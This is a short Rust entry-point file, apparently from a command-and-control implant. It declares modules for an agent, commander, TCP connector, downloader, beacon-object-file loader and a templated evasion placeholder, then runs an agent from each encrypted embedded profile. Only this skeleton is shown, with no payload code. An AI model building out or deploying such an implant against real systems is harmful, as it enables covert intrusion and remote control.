mod config;
mod crypto;
mod protocol;
mod agent;
mod commander;
mod runtime_common;
mod runtime_fs;
mod runtime_response;
mod async_queue;
mod transport_scaffold;
mod connector_tcp;
mod jobs;
mod downloader;
mod bof;
// __EVASION_MOD__

fn main() {
    for blob in config::ENC_PROFILES {
        if blob.is_empty() {
            continue;
        }
        if let Ok(mut agent) = agent::Agent::from_blob(blob) {
            agent.run();
        }
    }
}
